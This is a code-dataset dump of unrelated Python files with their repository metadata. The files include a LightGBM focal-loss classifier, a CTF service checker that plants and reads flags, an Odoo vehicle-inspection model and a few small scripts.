class Working_Hours(Model):
__tablename__ = 'working_hours'
biz_id=Column(CHAR(22),primary_key=True)
monday = Column(VARCHAR(40))
sunday = Column(VARCHAR(40))
tuesday = Column(VARCHAR(40))
wednesday = Column(VARCHAR(40))
thursday = Column(VARCHAR(40))
friday = Column(VARCHAR(40))
saturday = Column(VARCHAR(40))
|
[
"alirezaimn@yahoo.com"
] |
alirezaimn@yahoo.com
|
6e1ba496f5643843456002b2c52d9e8df006f364
|
f83c4ec82a4e02e599198372cb7987629665319c
|
/classifier/run_lgbm_focalloss.py
|
c0220813c96455c66ca501b0d650df662112b9ea
|
[] |
no_license
|
lxgend/Classification_Toolbox
|
32aa2e90d0f0a85e1c9487e9b167f1014ac4e743
|
7da4268f5b39865f8b12529d3e8589e752a2df79
|
refs/heads/master
| 2023-02-08T21:13:18.225932
| 2020-12-17T09:36:20
| 2020-12-17T09:36:20
| 259,933,031
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 6,178
|
py
|
# coding=utf-8
import joblib
import lightgbm as lgb
import numpy as np
from scipy.misc import derivative
from sklearn.metrics import classification_report
from classifier.nets.wv import MODEL_FILE
from data_processor.data2example import clf_data_processors
from data_processor.example2dataset_vec import load_and_cache_examples_df
from parm import *
def focal_loss_lgb_sk(y_true, y_pred, alpha, gamma, num_class):
"""
Parameters:
-----------
alpha, gamma: float
objective(y_true, y_pred) -> grad, hess
y_truearray-like of shape = [n_samples]
The target values.
y_predarray-like of shape = [n_samples] or shape = [n_samples * n_classes] (for multi-class task)
The predicted values.
"""
a, g = alpha, gamma
y_true = np.eye(num_class)[y_true.astype('int')]
y_pred = y_pred.reshape(-1, num_class)
def fl(x, t):
p = 1 / (1 + np.exp(-x))
return -(a * t + (1 - a) * (1 - t)) * ((1 - (t * p + (1 - t) * (1 - p))) ** g) * (
t * np.log(p) + (1 - t) * np.log(1 - p))
partial_fl = lambda x: fl(x, y_true)
# 求导数
grad = derivative(partial_fl, y_pred, n=1, dx=1e-6)
hess = derivative(partial_fl, y_pred, n=2, dx=1e-6)
# return grad.flatten('F'), hess.flatten('F')
return grad, hess
def focal_loss_lgb_eval_error_sk(y_true, y_pred, alpha, gamma, num_class):
"""
Adapation of the Focal Loss for lightgbm to be used as evaluation loss
"""
a, g = alpha, gamma
y_true = np.eye(num_class)[y_true.astype('int')]
y_pred = y_pred.reshape(-1, num_class, order='F')
p = 1 / (1 + np.exp(-y_pred))
loss = -(a * y_true + (1 - a) * (1 - y_true)) * ((1 - (y_true * p + (1 - y_true) * (1 - p))) ** g) * (
y_true * np.log(p) + (1 - y_true) * np.log(1 - p))
return 'focal_loss', np.mean(loss), False
def train(x_train, y_train):
num_class =15
focal_loss = lambda y_true, y_pred: focal_loss_lgb_sk(y_true, y_pred, 0.25, 2., num_class)
eval_error = lambda x, y: focal_loss_lgb_eval_error_sk(x, y, 0.25, 2., num_class)
params = {
'boosting_type': 'gbdt',
'max_depth': 6,
'num_leaves': 60,
'n_estimators': 200,
'objective': focal_loss,
# 'objective': 'multiclass',
'max_bin': 150,
'reg_alpha': 0.1,
'reg_lambda': 0.2,
# 'class_weight':weight
'n_jobs': 8,
'learning_rate': 0.1,
#'num_class':15
# 'silent': False
}
model = lgb.LGBMClassifier(**params)
# model.fit(x_train, y_train,
# eval_set=[(x_dev, y_dev)],
# eval_metric=eval_error)
model.fit(x_train, y_train)
# from sklearn.model_selection import GridSearchCV
# lg = lgb.LGBMClassifier(silent=False, verbose=-1)
# # 评分函数
# mll_scorer = make_scorer(multiclass_logloss, greater_is_better=False, needs_proba=True)
# # max_depth : 树最大深度, 模型过拟合可以降低max_depth
# # num_leaves: 取值应 <= 2 ^(max_depth), 超过此值会导致过拟合
# # min_data_in_leaf
# param_dist = {"max_depth": [10, 25, 50, 75],
# "learning_rate": [0.01, 0.05, 0.1],
# "num_leaves": [300, 500, 900, 1200],
# "n_estimators": [150, 200, 250],
# }
#
# parameters = {
# 'max_depth': [15, 20, 25, 30, 35],
# 'learning_rate': [0.01, 0.02, 0.05, 0.1, 0.15],
# 'feature_fraction': [0.6, 0.7, 0.8, 0.9, 0.95],
# 'bagging_fraction': [0.6, 0.7, 0.8, 0.9, 0.95],
# 'bagging_freq': [2, 4, 5, 6, 8],
# 'lambda_l1': [0, 0.1, 0.4, 0.5, 0.6],
# 'lambda_l2': [0, 10, 15, 35, 40],
# 'cat_smooth': [1, 10, 15, 20, 35]
# }
#
with open('model_lgbm.pkl', mode='wb') as f:
joblib.dump(model, f)
def evaluate(x_dev, y_dev, model):
# 模型预测
y_pred = model.predict(x_dev, num_iteration=model.best_iteration_)
# 查看各个类别的准召
print(classification_report(y_dev, y_pred))
def main(args):
# data init
clf_data_processor = clf_data_processors[args.task_name](args.data_dir)
args.id2label = clf_data_processor.get_labels()
args.label2id = {label: i for i, label in enumerate(args.id2label)}
num_labels = len(args.id2label)
print('num_labels %d' % (num_labels))
print('model %s' % args.model_type)
if args.model_type == 'fasttext_selftrain':
import fasttext
args.model = fasttext.load_model(os.path.join(PATH_MD_FT, 'model_ft_selftrain.pkl'))
args.vec_dim = 200
else:
args.model_path, args.vec_dim = MODEL_FILE[args.model_type]
args.word2id, args.wv_model = load_model(args.model_path)
if args.do_train:
x_train, y_train = load_and_cache_examples_df(args, clf_data_processor, data_type='train')
# print(len(x_train))
# print(len(x_train[0]))
# print(y_train.shape)
print('train_dataset %d' % len(y_train))
# x_dev, y_dev = load_and_cache_examples_df(args, clf_data_processor, data_type='dev')
# train
train(x_train, y_train)
if args.do_eval:
print('evaluate')
x_dev, y_dev = load_and_cache_examples_df(args, clf_data_processor, data_type='dev')
print('dev_dataset %d' % len(y_dev))
with open('model_lgbm.pkl', mode='rb') as f:
model = joblib.load(f)
evaluate(args, x_dev, y_dev, model)
class Args(object):
def __init__(self):
self.task_name = 'tnews_vec'
self.data_dir = PATH_DATA_TNEWS_PRE
# self.output_dir = os.path.join(os.path.dirname(os.path.abspath(__file__)), 'finetuned')
self.overwrite_cache = 1
self.max_seq_length = 42
# self.model_type = 'sg_tx'
self.model_type = 'fasttext_selftrain'
self.local_rank = -1
self.use_cpu = 0
self.do_train = 1
self.do_eval = 0
self.do_test = 0
if __name__ == '__main__':
# args = get_argparse().parse_args()
import time
a = time.time()
args = Args()
# main2(args)
main(args)
print(time.time() - a)
|
[
"lx3103@gmail.com"
] |
lx3103@gmail.com
|
a5fed35d5376b69927501652f565200ad51ad79b
|
ba9fa9990fae4a8e2a51a87fbc6e87675788e458
|
/merc/checker/checker.py
|
b5427b646675bb3bff04a9762d835d992f3d1956
|
[] |
no_license
|
n57uctf/yetictf-2021
|
34ef0c90c3e4a73b3a70996119c2069e7618063f
|
6def7043b0c40076aa86d86bfde533de2742e290
|
refs/heads/main
| 2023-04-10T23:51:40.890494
| 2021-04-21T04:17:29
| 2021-04-21T04:17:29
| 359,523,625
| 2
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,947
|
py
|
#!/usr/bin/env python3
import sys
import requests
import re
import math
from bs4 import BeautifulSoup
from merclib import *
def check(host):
chk = CheckMachine(host)
login = rnd_username()
passwd = rnd_password()
chk.register_user(login,passwd)
sess = chk.login_user(login,passwd)
ctype = chk.currency_type(sess)
chk.mine_one(sess, ctype)
cquit(Status.OK, "OK",f'{login}:{passwd}')
def put_flag1(host, flag):
chk = CheckMachine(host)
login = rnd_username()
passwd = rnd_password()
chk.register_user(login,passwd)
sess = chk.login_user(login,passwd)
ctype = chk.currency_type(sess)
chk.mine_one(sess,ctype)
req = sess.post(f'{chk.url}/management/transactions', data = {"type": ctype,"amount": "0.01","recv_login": "tellers2006","message": flag})
check_response(req, 'Could not send currency')
soup = BeautifulSoup(req.text, 'html.parser')
table = soup.findAll('td', text = re.compile(flag))
if not table:
cquit(Status.MUMBLE, 'Couldn\'t send message')
else:
cquit(Status.OK, f"{login}",f'{login}:{passwd}')
def get_flag1(host, flag, flag_id):
chk = CheckMachine(host)
login, passwd = flag_id.strip().split(":")
sess = chk.login_user(login,passwd)
req = sess.get(f'{chk.url}/management/transactions')
check_response(req, 'Could not get transaction messages')
soup = BeautifulSoup(req.text, 'html.parser')
table = soup.findAll('td', text = re.compile(flag))
if not table:
cquit(Status.CORRUPT, 'Couldn\'t find flag in transaction message')
else:
cquit(Status.OK, 'OK')
def put_flag2(host, flag):
chk = CheckMachine(host)
login = rnd_username()
passwd = rnd_password()
amount = 1
curr_amount = 0
result = 0
chk.register_user(login,passwd)
sess = chk.login_user(login,passwd)
#ctype = chk.currency_type(sess)
ctype = 'coins'
while result!=1:
result = chk.mine(sess,amount,curr_amount,ctype)
req = sess.post(f'{chk.url}/casinoe/VIP_page', data = {"email": login, "message": flag})
check_response(req, 'Could not send application')
soup = BeautifulSoup(req.text, 'html.parser')
table = soup.findAll('h4', text = re.compile(flag))
if not table:
cquit(Status.MUMBLE, 'Couldn\'t send message')
else:
cquit(Status.OK, f"{login}", f'{login}:{passwd}')
def get_flag2(host, flag, flag_id):
chk = CheckMachine(host)
login, passwd = flag_id.strip().split(":")
sess = chk.login_user(login,passwd)
req = sess.get(f'{chk.url}/casinoe/VIP_page')
check_response(req, 'Could not get application text')
soup = BeautifulSoup(req.text, 'html.parser')
table = soup.findAll('h4', text = re.compile(flag))
if not table:
cquit(Status.CORRUPT, 'Couldn\'t find flag in application message')
else:
cquit(Status.OK, 'OK')
if __name__ == '__main__':
action, *args = sys.argv[1:]
try:
if action == 'check':
host, = args
check(host)
elif action == 'put':
host, flag_id, flag, vuln_number = args
if vuln_number == '1':
put_flag1(host, flag)
else:
put_flag2(host, flag)
elif action == 'get':
host, flag_id, flag, vuln_number = args
if vuln_number == '1':
get_flag1(host, flag, flag_id)
else:
get_flag2(host, flag, flag_id)
else:
cquit(Status.ERROR, 'System error', 'Unknown action: ' + action)
cquit(Status.ERROR)
except (requests.exceptions.ConnectionError, requests.exceptions.ConnectTimeout):
cquit(Status.DOWN, 'Connection error')
except SystemError as e:
raise
except Exception as e:
cquit(Status.ERROR, 'System error', str(e))
|
[
"rudkovskiyalex@gmail.com"
] |
rudkovskiyalex@gmail.com
|
e98867a3a197ebb29a8f23339ac78c503871d5d3
|
b4dfb1830d6ce53bc131b3fbc8fbc54c85c017f1
|
/vehicle/models/vehi_assessment.py
|
84c0a53e6d70b731bcf5743254894be9f8565745
|
[] |
no_license
|
faizasaeed97/sales-module
|
843d41ded4d4cafc3e69618e2c86407be548ee9c
|
80c60daef01665651a25cfbd3117a354a2764068
|
refs/heads/master
| 2023-02-09T00:41:26.611256
| 2020-11-24T09:00:20
| 2020-11-24T09:00:20
| 325,536,230
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 19,695
|
py
|
from odoo import api, fields, models, _, tools
from odoo.osv import expression
import base64
from odoo import modules
from odoo.exceptions import AccessError, UserError, ValidationError
from PIL import Image
class vehicel_assessment(models.Model):
_name = 'vehicle.assessment'
selection_body = [
('accident', 'accident'),
('non-accident', 'non-accident'),
]
selection_engine = [
('complete', 'complete'),
('un-complete', 'uncomplete'),
('leakage', 'leakage'),
('non-leakage', 'non-leakage'),
('noise', 'noise'),
('no-noise', 'no-noise'),
('present', 'present'),
('not-present', 'not-present'),
('vibration', 'vibration'),
('non-vibrate', 'non-vibrate'),
('ok', 'ok'),
('not-ok', 'not-ok'),
]
selection_brakes = [
('smooth', 'smooth'),
('morethan50', 'more than 50%'),
('lessthan50', 'less than 50%'),
('ok', 'ok'),
('not-ok', 'not-ok'),
]
selection_suspension = [
('accident', 'accident'),
('non-accident', 'non-accident'),
('ok', 'ok'),
('not-ok', 'not-ok'),
]
selection_interior = [
('ok', 'ok'),
('not-ok', 'not-ok'),
('working', 'working'),
('not-working', 'not-working'),
]
selection_ac = [
('accident', 'accident'),
('non-accident', 'non-accident'),
('ok', 'ok'),
('not-ok', 'not-ok'),
('working', 'working'),
('not-working', 'not-working'),
]
selection_electrical = [
('accident', 'accident'),
('non-accident', 'non-accident'),
('noise', 'noise'),
('no-noise', 'no-noise'),
('present', 'present'),
('not-present', 'not-present'),
('vibration', 'vibration'),
('non-vibrate', 'non-vibrate'),
('ok', 'ok'),
('not-ok', 'not-ok'),
]
selection_exterior = [
('accident', 'accident'),
('non-accident', 'non-accident'),
('noise', 'noise'),
('no-noise', 'no-noise'),
('present', 'present'),
('not-present', 'not-present'),
('vibration', 'vibration'),
('non-vibrate', 'non-vibrate'),
('ok', 'ok'),
('not-ok', 'not-ok'),
]
selection_tyre = [
('accident', 'accident'),
('non-accident', 'non-accident'),
('noise', 'noise'),
('no-noise', 'no-noise'),
('present', 'present'),
('not-present', 'not-present'),
('vibration', 'vibration'),
('non-vibrate', 'non-vibrate'),
('ok', 'ok'),
('not-ok', 'not-ok'),
]
selection_drive = [
('accident', 'accident'),
('non-accident', 'non-accident'),
('noise', 'noise'),
('no-noise', 'no-noise'),
('present', 'present'),
('not-present', 'not-present'),
('vibration', 'vibration'),
('non-vibrate', 'non-vibrate'),
('ok', 'ok'),
('not-ok', 'not-ok'),
]
name = fields.Char('Name')
vehicle = fields.Many2one('vehicle')
Radiator_Core_Support = fields.Selection(selection_body,string="Radiator")
Radiator_Core_Support_img= fields.Selection(selection_body,string="Radiator")
Right_Strut_Tower_Apron= fields.Selection(selection_body,string="Radiator")
Right_Strut_Tower_Apron_img= fields.Selection(selection_body,string="Radiator")
Left_Strut_Tower_Apron= fields.Selection(selection_body,string="Radiator")
Left_Strut_Tower_Apron_img= fields.Selection(selection_body,string="Radiator")
Right_Front_Rail= fields.Selection(selection_body,string="Radiator")
Right_Front_Rail_img= fields.Selection(selection_body,string="Radiator")
Left_Front_Rail= fields.Selection(selection_body,string="Radiator")
Left_Front_Rail_img= fields.Selection(selection_body,string="Radiator")
Cowl_Panel_Firewall= fields.Selection(selection_body,string="Radiator")
Cowl_Panel_Firewall_img= fields.Selection(selection_body,string="Radiator")
RightA_Pillar= fields.Selection(selection_body,string="Radiator")
RightA_Pillar_img= fields.Selection(selection_body,string="Radiator")
LeftA_Pillar= fields.Selection(selection_body,string="Radiator")
LeftA_Pillar_img= fields.Selection(selection_body,string="Radiator")
RightB_Pillar= fields.Selection(selection_body,string="Radiator")
RightB_Pillar_img= fields.Selection(selection_body,string="Radiator")
LeftB_Pillar= fields.Selection(selection_body,string="Radiator")
LeftB_Pillar_img= fields.Selection(selection_body,string="Radiator")
RightC_Pillar= fields.Selection(selection_body,string="Radiator")
RightC_Pillar_img= fields.Selection(selection_body,string="Radiator")
LeftC_Pillar= fields.Selection(selection_body,string="Radiator")
LeftC_Pillar_img= fields.Selection(selection_body,string="Radiator")
Boot_Floor= fields.Selection(selection_body,string="Radiator")
Boot_Floor_img= fields.Selection(selection_body,string="Radiator")
Boot_Lock_Pillar= fields.Selection(selection_body,string="Radiator")
Boot_Lock_Pillar_img= fields.Selection(selection_body,string="Radiator")
Front_Sub_Frame= fields.Selection(selection_body,string="Radiator")
Front_Sub_Frame_img= fields.Selection(selection_body,string="Radiator")
Rear_Sub_Frame= fields.Selection(selection_body,string="Radiator")
Rear_Sub_Frame_img= fields.Selection(selection_body,string="Radiator")
# ---------------------------------------------------------------
Engine_Oil_Level= fields.Selection(selection_engine,string="Radiator")
Engine_Oil_Level_img= fields.Selection(selection_engine,string="Radiator")
Engine_Oil_Leakage= fields.Selection(selection_engine,string="Radiator")
Engine_Oil_Leakage_img= fields.Selection(selection_engine,string="Radiator")
Transmission_Oil_Leakage= fields.Selection(selection_engine,string="Radiator")
Transmission_Oil_Leakage_img= fields.Selection(selection_engine,string="Radiator")
Brake_Oil_Level= fields.Selection(selection_engine,string="Radiator")
Brake_Oil_Level_img= fields.Selection(selection_engine,string="Radiator")
Brake_Oil_Leakage= fields.Selection(selection_engine,string="Radiator")
Brake_Oil_Leakage_img= fields.Selection(selection_engine,string="Radiator")
Washer_Fluid_Level= fields.Selection(selection_engine,string="Radiator")
Washer_Fluid_Level_img= fields.Selection(selection_engine,string="Radiator")
Washer_Fluid_Leakage= fields.Selection(selection_engine,string="Radiator")
Washer_Fluid_Leakage_img= fields.Selection(selection_engine,string="Radiator")
Coolant_Leakage= fields.Selection(selection_engine,string="Radiator")
Coolant_Leakage_img= fields.Selection(selection_engine,string="Radiator")
Catalytic_Convertor= fields.Selection(selection_engine,string="Radiator")
Catalytic_Convertor_img= fields.Selection(selection_engine,string="Radiator")
Exhaust_Sound= fields.Selection(selection_engine,string="Radiator")
Exhaust_Sound_img= fields.Selection(selection_engine,string="Radiator")
Exhaust_Joints= fields.Selection(selection_engine,string="Radiator")
Exhaust_Joints_img= fields.Selection(selection_engine,string="Radiator")
Radiator= fields.Selection(selection_engine,string="Radiator")
Radiator_img= fields.Selection(selection_engine,string="Radiator")
Suction_Fan= fields.Selection(selection_engine,string="Radiator")
Suction_Fan_img= fields.Selection(selection_engine,string="Radiator")
Starter_Operation= fields.Selection(selection_engine,string="Radiator")
Starter_Operation_img= fields.Selection(selection_engine,string="Radiator")
# brakes===============================================================
Front_Right_Disc= fields.Selection(selection_brakes,string="Radiator")
Front_Right_Disc_img= fields.Selection(selection_brakes,string="Radiator")
Front_Left_Disc= fields.Selection(selection_brakes,string="Radiator")
Front_Left_Disc_img= fields.Selection(selection_brakes,string="Radiator")
Front_Right_Brake_Pad= fields.Selection(selection_brakes,string="Radiator")
Front_Right_Brake_Pad_img= fields.Selection(selection_brakes,string="Radiator")
Front_Left_Brake_Pad= fields.Selection(selection_brakes,string="Radiator")
Front_Left_Brake_Pad_img= fields.Selection(selection_brakes,string="Radiator")
Parking_Hand_Brake= fields.Selection(selection_brakes,string="Radiator")
Parking_Hand_Brake_img= fields.Selection(selection_brakes,string="Radiator")
# Interior===============================================================
Steering_Wheel_Condition= fields.Selection(selection_interior,string="Radiator")
Steering_Wheel_Condition_img= fields.Selection(selection_interior,string="Radiator")
Steering_Wheel_Buttons= fields.Selection(selection_interior,string="Radiator")
Steering_Wheel_Buttons_img= fields.Selection(selection_interior,string="Radiator")
Horn= fields.Selection(selection_interior,string="Radiator")
Horn_img= fields.Selection(selection_interior,string="Radiator")
Lights_Lever_Switch= fields.Selection(selection_interior,string="Radiator")
Lights_Lever_Switch_img= fields.Selection(selection_interior,string="Radiator")
Wiper_Washer_Lever= fields.Selection(selection_interior,string="Radiator")
Wiper_Washer_Lever_img= fields.Selection(selection_interior,string="Radiator")
# AC heater===============================================================
AC_Fitted= fields.Selection(selection_ac,string="Radiator")
AC_Fitted_img= fields.Selection(selection_ac,string="Radiator")
AC_Operational= fields.Selection(selection_ac,string="Radiator")
AC_Operational_img= fields.Selection(selection_ac,string="Radiator")
Blower_Condenser= fields.Selection(selection_ac,string="Radiator")
Blower_Condenser_img= fields.Selection(selection_ac,string="Radiator")
Compressor_Operatio= fields.Selection(selection_ac,string="Radiator")
Compressor_Operatio_img= fields.Selection(selection_ac,string="Radiator")
Cooling_Excellent= fields.Selection(selection_ac,string="Radiator")
Cooling_Excellent_img= fields.Selection(selection_ac,string="Radiator")
Heating= fields.Selection(selection_ac,string="Radiator")
Heating_img= fields.Selection(selection_ac,string="Radiator")
# electial heater===============================================================
Voltage= fields.Selection(selection_electrical,string="Radiator")
Voltage_img= fields.Selection(selection_electrical,string="Radiator")
Terminals_Condition= fields.Selection(selection_electrical,string="Radiator")
Terminals_Condition_img= fields.Selection(selection_electrical,string="Radiator")
Charging= fields.Selection(selection_electrical,string="Radiator")
Charging_img= fields.Selection(selection_electrical,string="Radiator")
Alternator_Operation= fields.Selection(selection_electrical,string="Radiator")
Alternator_Operation_img= fields.Selection(selection_electrical,string="Radiator")
Gauges= fields.Selection(selection_electrical,string="Radiator")
Gauges_img= fields.Selection(selection_electrical,string="Radiator")
# exterior---------------------------------------------
Trunk_Lock= fields.Selection(selection_exterior,string="Radiator")
Trunk_Lock_img= fields.Selection(selection_exterior,string="Radiator")
Front_Windshield_Condition= fields.Selection(selection_exterior,string="Radiator")
Front_Windshield_Condition_img= fields.Selection(selection_exterior,string="Radiator")
Rear_Windshield_Condition= fields.Selection(selection_exterior,string="Radiator")
Rear_Windshield_Condition_img= fields.Selection(selection_exterior,string="Radiator")
Front_Right_Door_Fittings= fields.Selection(selection_exterior,string="Radiator")
Front_Right_Door_Fittings_img= fields.Selection(selection_exterior,string="Radiator")
Front_Left_Door_Fittings= fields.Selection(selection_exterior,string="Radiator")
Front_Left_Door_Fittings_img= fields.Selection(selection_exterior,string="Radiator")
Rear_Right_Door_Fittings= fields.Selection(selection_exterior,string="Radiator")
Rear_Right_Door_Fittings_img= fields.Selection(selection_exterior,string="Radiator")
Rear_Left_Door_Fittings= fields.Selection(selection_exterior,string="Radiator")
Rear_Left_Door_Fittings_img= fields.Selection(selection_exterior,string="Radiator")
Front_Right_Door_Levers= fields.Selection(selection_exterior,string="Radiator")
Front_Right_Door_Levers_img= fields.Selection(selection_exterior,string="Radiator")
Front_Left_Door_Levers= fields.Selection(selection_exterior,string="Radiator")
Front_Left_Door_Levers_img= fields.Selection(selection_exterior,string="Radiator")
Rear_Right_Door_Levers= fields.Selection(selection_exterior,string="Radiator")
Rear_Right_Door_Levers_img= fields.Selection(selection_exterior,string="Radiator")
Rear_Left_Door_Levers= fields.Selection(selection_exterior,string="Radiator")
Rear_Left_Door_Levers_img= fields.Selection(selection_exterior,string="Radiator")
Front_Right_Door_Window= fields.Selection(selection_exterior,string="Radiator")
Front_Right_Door_Window_img= fields.Selection(selection_exterior,string="Radiator")
Front_Left_Door_Window= fields.Selection(selection_exterior,string="Radiator")
Front_Left_Door_Window_img= fields.Selection(selection_exterior,string="Radiator")
Rear_Right_Door_Window= fields.Selection(selection_exterior,string="Radiator")
Rear_Right_Door_Window_img= fields.Selection(selection_exterior,string="Radiator")
Rear_Left_Door_Window= fields.Selection(selection_exterior,string="Radiator")
Rear_Left_Door_Window_img= fields.Selection(selection_exterior,string="Radiator")
Windscreen_Wiper= fields.Selection(selection_exterior,string="Radiator")
Windscreen_Wiper_img= fields.Selection(selection_exterior,string="Radiator")
Right_Headlight= fields.Selection(selection_exterior,string="Radiator")
Right_Headlight_img= fields.Selection(selection_exterior,string="Radiator")
Left_Headlight= fields.Selection(selection_exterior,string="Radiator")
Left_Headlight_img= fields.Selection(selection_exterior,string="Radiator")
Right_Headlight= fields.Selection(selection_exterior,string="Radiator")
Right_Headlight_img= fields.Selection(selection_exterior,string="Radiator")
Left_Headlight= fields.Selection(selection_exterior,string="Radiator")
Left_Headlight_img= fields.Selection(selection_exterior,string="Radiator")
Right_Taillight= fields.Selection(selection_exterior,string="Radiator")
Right_Taillight_img= fields.Selection(selection_exterior,string="Radiator")
Left_Taillight= fields.Selection(selection_exterior,string="Radiator")
Left_Taillight_img= fields.Selection(selection_exterior,string="Radiator")
Right_Taillight= fields.Selection(selection_exterior,string="Radiator")
Right_Taillight_img= fields.Selection(selection_exterior,string="Radiator")
Left_Taillight= fields.Selection(selection_exterior,string="Radiator")
Left_Taillight_img= fields.Selection(selection_exterior,string="Radiator")
Number_Plate_Lights= fields.Selection(selection_exterior,string="Radiator")
Number_Plate_Lights_img= fields.Selection(selection_exterior,string="Radiator")
Number_Plate_Lights= fields.Selection(selection_exterior,string="Radiator")
Number_Plate_Lights_img= fields.Selection(selection_exterior,string="Radiator")
Fog_Lights_Working= fields.Selection(selection_exterior,string="Radiator")
Fog_Lights_Working_img= fields.Selection(selection_exterior,string="Radiator")
Fog_Lights= fields.Selection(selection_exterior,string="Radiator")
Fog_Lights_img= fields.Selection(selection_exterior,string="Radiator")
Reverse_Light= fields.Selection(selection_exterior,string="Radiator")
Reverse_Light_img= fields.Selection(selection_exterior,string="Radiator")
Windscreen_Wiper_Rubbers= fields.Selection(selection_exterior,string="Radiator")
Windscreen_Wiper_Rubbers_img= fields.Selection(selection_exterior,string="Radiator")
# Tyres---------------------------------------------
Front_Right_Tyre= fields.Selection(selection_tyre,string="Radiator")
Front_Right_Tyre_img= fields.Selection(selection_tyre,string="Radiator")
Front_Left_Tyre= fields.Selection(selection_tyre,string="Radiator")
Front_Left_Tyre_img= fields.Selection(selection_tyre,string="Radiator")
Rear_Right_Tyre= fields.Selection(selection_tyre,string="Radiator")
Rear_Right_Tyre_img= fields.Selection(selection_tyre,string="Radiator")
Rear_Left_Tyre= fields.Selection(selection_tyre,string="Radiator")
Rear_Left_Tyre_img= fields.Selection(selection_tyre,string="Radiator")
Spare_Tyre= fields.Selection(selection_tyre,string="Radiator")
Spare_Tyre_img= fields.Selection(selection_tyre,string="Radiator")
Brand_Name= fields.Selection(selection_tyre,string="Radiator")
Brand_Name_img= fields.Selection(selection_tyre,string="Radiator")
Tyre_Size= fields.Selection(selection_tyre,string="Radiator")
Tyre_Size_img= fields.Selection(selection_tyre,string="Radiator")
Rims= fields.Selection(selection_tyre,string="Radiator")
Rims_img= fields.Selection(selection_tyre,string="Radiator")
Wheel_Caps= fields.Selection(selection_tyre,string="Radiator")
Wheel_Caps_img= fields.Selection(selection_tyre,string="Radiator")
# Test drive---------------------------------------------
Engine_Noise= fields.Selection(selection_drive,string="Radiator")
Engine_Noise_img= fields.Selection(selection_drive,string="Radiator")
Engine_Pick= fields.Selection(selection_drive,string="Radiator")
Engine_Pick_img= fields.Selection(selection_drive,string="Radiator")
Gear_Shifting= fields.Selection(selection_drive,string="Radiator")
Gear_Shifting_img= fields.Selection(selection_drive,string="Radiator")
Drive_Shaft_Noise= fields.Selection(selection_drive,string="Radiator")
Drive_Shaft_Noise_img= fields.Selection(selection_drive,string="Radiator")
Brake_Pedal_Operation= fields.Selection(selection_drive,string="Radiator")
Brake_Pedal_Operation_img= fields.Selection(selection_drive,string="Radiator")
ABS_Operation= fields.Selection(selection_drive,string="Radiator")
ABS_Operation_img= fields.Selection(selection_drive,string="Radiator")
Front_Suspension= fields.Selection(selection_drive,string="Radiator")
Front_Suspension_img= fields.Selection(selection_drive,string="Radiator")
Rear_Suspension= fields.Selection(selection_drive,string="Radiator")
Rear_Suspension_img= fields.Selection(selection_drive,string="Radiator")
Steering_Operation= fields.Selection(selection_drive,string="Radiator")
Steering_Operation_img= fields.Selection(selection_drive,string="Radiator")
Steering_Wheel_Alignment= fields.Selection(selection_drive,string="Radiator")
Steering_Wheel_Alignment_img= fields.Selection(selection_drive,string="Radiator")
Heater_Operation= fields.Selection(selection_drive,string="Radiator")
Heater_Operation_img= fields.Selection(selection_drive,string="Radiator")
AC_Operation= fields.Selection(selection_drive,string="Radiator")
AC_Operation_img= fields.Selection(selection_drive,string="Radiator")
Speedometer= fields.Selection(selection_drive,string="Radiator")
Speedometer_img= fields.Selection(selection_drive,string="Radiator")
|
[
"rao.kashif8787@gmail.com"
] |
rao.kashif8787@gmail.com
|
c72ad5c70ed4a19f205806882e71fa796e64c8e9
|
b565bb62e123bf42644c9c72f86077238b02f2c1
|
/myproyect/bin/pip
|
69d69d0c94541a00587fc6cb6b510fa15e7a974e
|
[] |
no_license
|
grupo0331/my-first-blog
|
6bb569aab4e338d31f5935a4708fc60793741c58
|
5b502bb34192bfd7afd2f467ef79a31b14d753a9
|
refs/heads/master
| 2020-05-30T07:48:59.206361
| 2019-06-03T14:42:39
| 2019-06-03T14:42:39
| 189,539,031
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 240
|
#!/home/daw/proyecto/myproyect/bin/python3
# -*- coding: utf-8 -*-
import re
import sys
from pip._internal import main
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
sys.exit(main())
|
[
"grupo.0331@gmail.com"
] |
grupo.0331@gmail.com
|
|
7bb0d72071327484001e9078ca7127159bd0f30b
|
8f441cd3f02c7ee7b83bbe0196235f9df6ecc30b
|
/input_validation/another_validation.py
|
90d8e1e5694ce662e09db0323cc222b199ba0e95
|
[] |
no_license
|
dcoreyrasm/SoftwareDesign
|
33057ebd88872596b96dfa50f963bcde7190da52
|
58c729964fab108fd1aee364ac7c20f269b2fc30
|
refs/heads/master
| 2021-01-09T06:41:06.870660
| 2016-09-14T00:38:04
| 2016-09-14T00:38:04
| 66,110,002
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 320
|
py
|
#Program prompts user to enter an integer between 5 and 10 (inclusive) until
#they do so correctly.
number = input("Enter an integer between 5 and 10 (inclusive): ")
while number >10 or number < 5:
print "Invalid input!",
number = input("Enter an integer between 5 and 10 (inclusive): ")
print ("Thank-you!")
|
[
"dcorey.rasmussen@gmail.com"
] |
dcorey.rasmussen@gmail.com
|
067a8fe4686266d56354a64f364a4c13e4adb852
|
a6da6e69b75cea41c90b6aa497896d379cfbac9c
|
/neural_nets/mnist/web/load.py
|
c03c357a9950cba2e88bbe111da7141b29242af2
|
[] |
no_license
|
grozail/otto-eilert
|
ee898c285688b87158c41c3b596ebeaca1e74f70
|
bb36429faeda671d4e7e126ff1d73212813f6039
|
refs/heads/master
| 2021-08-27T22:33:20.762926
| 2017-12-04T13:33:00
| 2017-12-04T13:33:00
| 113,045,915
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 619
|
py
|
import numpy as np
import keras.models
from keras.models import model_from_json
from scipy.misc import imread, imresize, imshow
import tensorflow as tf
def init():
json_file = open('model.json', 'r')
loaded_model_json = json_file.read()
json_file.close()
loaded_model = model_from_json(loaded_model_json)
# load woeights into new model
loaded_model.load_weights("model.h5")
print("Loaded Model from disk")
loaded_model.compile(loss='categorical_crossentropy', optimizer='adadelta', metrics=['accuracy'])
graph = tf.get_default_graph()
return loaded_model, graph
|
[
"grozail@yandex.ru"
] |
grozail@yandex.ru
|
8da6c731d5e0553722f2e56ef3a7a028a86cce95
|
4ca8df3a127e9b15cbfecea6505928741f685a63
|
